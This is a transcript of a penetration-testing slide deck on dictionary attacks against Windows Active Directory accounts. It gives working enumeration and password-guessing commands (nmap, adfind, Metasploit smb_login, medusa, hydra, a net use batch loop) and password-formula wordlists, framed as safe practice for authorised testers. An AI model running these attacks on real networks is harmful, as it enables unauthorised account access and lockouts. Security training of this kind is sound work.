Introduction to Windows Dictionary Attacks
21
Introduction to Windows Dictionary Attacks Author: Scott Sutherland
-
Upload
nullbind -
Category
Technology
-
view
1.495 -
download
2
description
In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered: Identify domains Enumerate domain controllers Enumerate users from domain controllers Enumerate password policy from domain controllers Perform dictionary attack More security blogs by the authors can be found @ https://www.netspi.com/blog/
Transcript of Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Author: Scott Sutherland
Who am I?
Scott Sutherland
• Principal Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: Blogs, white papers, tools etc
Presentation Goals
• Identify the value of dictionary attacks
• Provide new penetration testers with a safe approach to Windows dictionary attacks
• Provide security professionals with questions they should be asking their contractors
Before we begin…
Dictionary Attack
Brute Force Attack
Why dictionary attacks?
What are the goals?
• Identify accounts configured with weak or default passwords – “It’s human nature”
• Use accounts as entry points during penetration tests
What’s the impact?
• Unauthorized access to critical: ‒ Systems
‒ Applications
‒ data
• User impersonation
Are There Alternatives?
Yes.
Approaches typically includes:
• Cracking pw hashes offline with:
‒ Pre-computed hash libraries like Rainbow Tables
‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper
• Dumping clear text passwords for interactive sessions with Mimikatz
Dictionary Attacks: Process Overview
Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
Identify Domains: Methods
Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for “USERDNSDOMAIN”
• Review the registry for the default domain
Identify Domains: Tools
Method Tools Auth
DHCP Info IPCONFIG No
NetBIOS Queries NETSTAT –A <IP> No
DNS Queries
nmap -sL <IP Range> -oA output_rnds
./reverseraider -r <IP Range>
./dnswalk victem.com
perl fierce.pl -dns <domainname> -threads
5 -file <domainame>-dns.output
No
Sniffing Wireshark (GUI) + Filter for browser traffic
Network Monitor (GUI)
Etherape (GUI)
No
RDP Drop Down nmap –sS –PN –p3389 <IP Range>
Then visit with RDP client No
Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
Enumerate DCs: Tools
Methods Tools Auth
DNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain> No
RPC Queries NLTEST /DCLIST <domain>
FindPDC <domain> <request count> No
Port Scanning NMAP –sS –p389,636 –PN <IP Range> No
NetBIOS Scanning
FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT
–A %i No
NET GROUP Command
Net group “Domain Controllers” /domain Yes
LDAP Queries LDAP Administrator (GUI Tool)
Hyena (GUI Tool) adfind -b -sc dcdmp <domain> -gc | grep -i “>name:”
| gawk -F ” ” “{print $2}” | sort | uniq
Yes & No
Enumerate Domain Users: Methods
Unauthenticated Methods
• RPC Queries
• SID Brute Forcing
• SNMP Queries
• LDAP Queries
• Sharepoint Fuzzing
Authenticated Methods
• NET USER command
• WMI commands
Enumerate Domain Users: Tools 1
Methods Tools Auth
RPC Endpoints
dumpsec.exe /computer=\\<IP> /rpt=usersonly
/saveas=csv /outfile=domain_users.txt
enum –N <ip>
enum –U <ip>
Yes & no
SID Brute Forcing
ruby c:\metasploit\msf3\msfcli
auxiliary/scanner/smb/smb_lookupsid
SMBDomain=. MaxRID=10000 RHOSTS=<IP
Address> E > domain_users.txt
Getacct (GUI)
Yes & no
SNMP Queries
ruby c:\metasploit\msf3\msfcli
auxiliary/scanner/snmp/snmp_enumusers
SMBDomain=. RHOSTS=<IP Address> E
Mibbrowser (GUI)
SNMP Walk
Yes & no
Enumerate Domain Users: Tools 2
Methods Tools Auth
LDAP Queries adfind -b DC=<victim>,DC=<com> -f
“objectcategory=user” -gc | grep -i
“sAMAccountName:” | gawk -F “:” “{print $2}” | gawk
-F ” ” “{print $1}”| sort > domain_users.txt
Yes & no
Sharepoint Fuzzing
Fuzz parameters with BURP to enumerate domain
users. Example URL below:
https://www.[website].com/sites/[sitename]/_layouts/
userdisp.aspx?Force=True&ID=[2 ]
Yes & no
NET USERS Command
Net users /domain > domain_users.txt Yes
WMI Commands
wmic /user:<user> /password:<password> /node:<IP
address> domain_users.txt Yes
Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC Endpoints
Authenticated Methods
• NET ACCOUNTS
Command
What does it all mean?
• Threshold, duration,
and window
Lockout threshold: 5
Lockout duration: 15
Lockout observation window : 15
Get Domain Lockout Policy: Tools
Methods Tools Auth
RPC Queries
Enum –P <IP Address>
dumpsec.exe /computer=\\<IP> /rpt=policy
/saveas=csv /outfile=domain_policy.txt
Yes & No
NET ACCOUNTS COMMAND
NET ACCOUNTS YEs
Create a Dictionary: Methods
Classics Still Work • Blank • Username as password • password
Common Formulas = Most Effective • <Password><Number> • <Companyname><Number> • <Season><Year> • <Sports team>Number>
Popular Dictionaries • Metasploit dictionaries • Rock you • FuzzDB • John the ripper
Create a Dictionary: Tools
Dictionary URLs / Lists
Classics Blank password
Username as password
password as password
Formulas
<Password><Number>
<Companyname><Number>
<Season><Year>
<Sports team>Number>
Your Brain! Think of keywords relative to the target
company /geographic location and you’ll get more out
of your dictionary attacks!
Rockyou http://www.skullsecurity.org/wiki/index.php/Passwords
FuzzDB http://code.google.com/p/fuzzdb/
https://github.com/rustyrobot/fuzzdb
John the Ripper http://www.openwall.com/wordlists/
Perform Dictionary Attack: Rules
The Rule to Live By:
Respect the lockout policy
• General idea = Attempt a few passwords for all
of the domain users each round, not a 1000 passwords against one user
• Subtract 2 attempts from the lockout policy
Example: Lockout=5, Attempts=3
• Wait 5 to 10 minutes beyond the observation window
Perform Dictionary Attack: Tools
Tools Commands OS
Medusa medusa -H hosts.txt -U users.txt -P passwords.txt -
T 20 -t 10 -L -F -M smbnt Linux
Bruter Easy to use GUI and not CLI that I know of. Windows
Metasploit smb_login
ruby c:\metasploit\msf3\msfcli
auxiliary/scanner/smb/smb_login THREADS=5
BLANK_PASSWORDS=true USER_AS_PASS=true
PASS_FILE=c:\\passwords.txt
USER_FILE=c:\\allusers.txt SMBDomain=.
RHOSTS=192.168.1.1 E
Windows and Linux
Hydra hydra.exe -L users.txt -P passwords.txt -o
credentials.txt <ip> smb Windows and Linux
Batch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) do
net user \\<ip>\IPC$ /user:<user> %a Windows
Conclusions
• There is more than one way to do everything!
• Enumerate all available options
• It’s easy to lockout accounts – respect the password policy
• Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests
